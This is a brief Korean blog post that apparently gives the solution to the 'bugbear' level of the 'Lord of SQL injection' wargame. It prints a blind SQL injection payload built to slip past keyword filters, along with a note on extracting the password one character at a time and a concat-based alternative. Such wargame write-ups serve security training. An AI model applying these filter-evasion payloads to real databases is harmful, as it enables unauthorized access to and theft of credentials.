[Level 13]Lord of SQL injection – bugbear

Answer

no=0||instr(id,char(103))-1%26%26hex(mid(pw,1,1))in(35)
뭐 문석하자면
> instr(id,char(103))-1         :  id가 guest인 부분을 삭제함
> hex(mid(pw,1,1))in(35)   : blind sql injection을 진행하는 부분

잡설
concat함수가 필요하다고 했던 이유는 guest부분을 삭제하는 대신에
id에 admin을 넣으려고 할때 id%0din%0dconcat(char(97), …) 이런식으로 표현 할 수 있기 때문이다.

카테고리LOS

글의 문제가 있다면 댓글을 달아 주세요.

이 사이트는 스팸을 줄이는 아키스밋을 사용합니다. 댓글이 어떻게 처리되는지 알아보십시오.